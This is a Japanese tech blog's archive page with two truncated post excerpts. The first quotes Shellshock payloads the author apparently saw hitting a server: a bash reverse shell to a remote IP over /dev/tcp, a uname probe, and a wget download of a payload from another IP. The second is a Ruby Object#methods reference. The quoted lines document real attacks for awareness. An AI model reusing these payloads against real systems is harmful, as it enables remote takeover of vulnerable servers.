Tbpgr Blog

Employee Experience Engineer tbpgr(てぃーびー) のブログ

2014-09-30から1日間の記事一覧

shellshock攻撃例

shellshockの攻撃、こんなん来てた "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'""() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a""() { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmo…

Ruby | Object | methods

概要 Object#methods(include_inherited = true) -> [Symbol] 詳細 オブジェクトから呼び出し可能なメソッドの配列を返却。 public, protected のメソッドが対象。 サンプルコード class Hoge def public_hoge; end protected def protected_hoge; end priva…